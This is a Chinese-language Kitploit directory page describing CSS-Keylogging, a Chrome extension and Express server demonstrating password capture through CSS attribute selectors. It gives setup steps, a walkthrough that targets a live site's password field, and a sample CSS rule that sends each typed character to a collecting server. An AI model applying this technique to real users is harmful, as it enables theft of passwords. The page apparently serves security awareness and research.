Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CSS-Keylogging — Chrome扩展和Express服务器,利用CSS的键盘记录能力。 | Kitploit
工具/GitHubGitHub/maxchehab/css-keylogging
漏洞利用信息收集Web安全渗透测试
GitHubmaxchehab/css-keylogging

CSS-Keylogging

Chrome扩展和Express服务器,利用CSS的键盘记录能力。

查看仓库
3.2k4248年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CSS 键盘记录器

利用 CSS 键盘记录功能的 Chrome 扩展和 Express 服务器。

使用方法

设置 Chrome 扩展

  1. 下载仓库 git clone https://github.com/maxchehab/CSS-Keylogging
  2. 在浏览器中访问 chrome://extensions(或点击 Chrome 菜单最右侧的三横图标,选择“更多工具”下的“扩展程序”)。
  3. 确保右上角的“开发者模式”复选框已勾选。
  4. 点击“加载已解压的扩展程序”,弹出文件选择对话框。
  5. 选择你下载仓库目录中的 css-keylogger-extension 文件夹。

设置 Express 服务器

  1. yarn
  2. yarn start

黑掉 l33t 密码

  1. 打开一个使用受控组件框架(如 React)的网站。https://instagram.com。
  2. 按下任意页面右上角的扩展图标 C。
  3. 输入你的密码。
  4. 你的密码将被 Express 服务器捕获。

工作原理

这个攻击非常简单。利用 CSS 属性选择器,可以在加载 background-image 的伪装下,向外部服务器请求资源。

例如,以下 CSS 会选择所有 type 等于 password 且 value 以 a 结尾的 input 元素,然后尝试从 http://localhost:3000/a 加载一张图片。

root@kitploit:~
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

通过一个简单的脚本,可以生成一个CSS文件,为每个ASCII字符发送自定义请求。

下载工具